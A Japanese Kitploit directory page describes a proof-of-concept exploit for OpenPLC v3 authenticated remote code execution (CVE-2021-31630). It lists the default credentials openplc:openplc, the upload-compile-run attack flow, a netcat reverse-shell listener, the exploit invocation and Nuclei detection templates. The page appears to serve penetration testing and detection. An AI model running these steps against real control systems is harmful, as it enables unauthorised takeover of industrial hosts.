Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/machevalia/openplc-cve-2021-31630-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ペイロード開発
GitHubmachevalia/openplc-cve-2021-31630-rce

OpenPLC-CVE-2021-31630-RCE

リポジトリを見る
321年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

OpenPLC v3 認証済みRCE(CVE-2021-31630)

これは、OpenPLC v3 の脆弱性 CVE-2021-31630 向けの、モダンな Python 3.13+ 互換の概念実証(PoC)エクスプロイトです。この脆弱性により、認証済みユーザーが悪意のあるコードを含むカスタムハードウェアレイヤーをアップロードし、ホスト上でリモートコード実行(RCE)を引き起こすことが可能になります。

元の脆弱性の発見とアドバイザリは Fellipe Oliveira によるものです。 この再実装および近代化版では、httpx、CLIツール、ロギング、より安全な検出技術を使用しています。

エクスプロイト概要

  • 脆弱性: CVE-2021-31630
  • コンポーネント: OpenPLC v3 Webサーバー
  • 影響: 認証済みリモートコード実行
  • デフォルト認証情報: openplc:openplc

エクスプロイトの流れ

  1. 有効な認証情報を使用してログインする
  2. 悪意のあるCコードをカスタムハードウェアレイヤーとしてアップロードする
  3. コンパイルをトリガーする
  4. 実行をトリガーする(任意)
  5. リバースシェル接続を受信する

使用方法

  1. リスナーを起動する:
root@kitploit:~
nc -lvnp 9001
  1. エクスプロイトを実行する:
root@kitploit:~
python3 openplc_rce.py http://target:8080 -lh YOUR_IP -lp 9001

オプションフラグ:

  • -u ユーザー名(デフォルト: openplc)
  • -p パスワード(デフォルト: openplc)
  • -t タイムアウト(秒)(デフォルト: 20)

機能

  • Python 3.13+ と互換性あり
  • httpx を使用して構築
  • クリーンな出力のためのロギングサポート
  • 再利用が容易なモジュール関数
  • Nuclei 検出テンプレート同梱

Nuclei 検出テンプレート

  1. デフォルト認証情報のチェック
root@kitploit:~
nuclei -t nuclei-templates/openplc-default-login.yaml -u http://target:8080
  1. パッシブRCE脆弱性チェック
root@kitploit:~
nuclei -t nuclei-templates/openplc-authenticated-rce-check.yaml -u http://target:8080

2つ目のテンプレートはログインし、無害なペイロードのアップロードとコンパイルを試みて、実際のコード実行をトリガーせずに、脆弱性の可能性を確認します。

含まれるファイル

  • OpenPLC_CVE_2021_31630.py – Python 3.13+ エクスプロイト
  • nuclei-templates/openplc-default-login.yaml – デフォルト認証情報を検出
  • nuclei-templates/openplc-authenticated-rce-check.yaml – 脆弱な動作を安全に検出

⚠️ 法的 / 倫理

このコードは、教育および許可を得たセキュリティテスト専用です。 システム所有者からの明示的な許可なしに使用しないでください。

ツールをダウンロード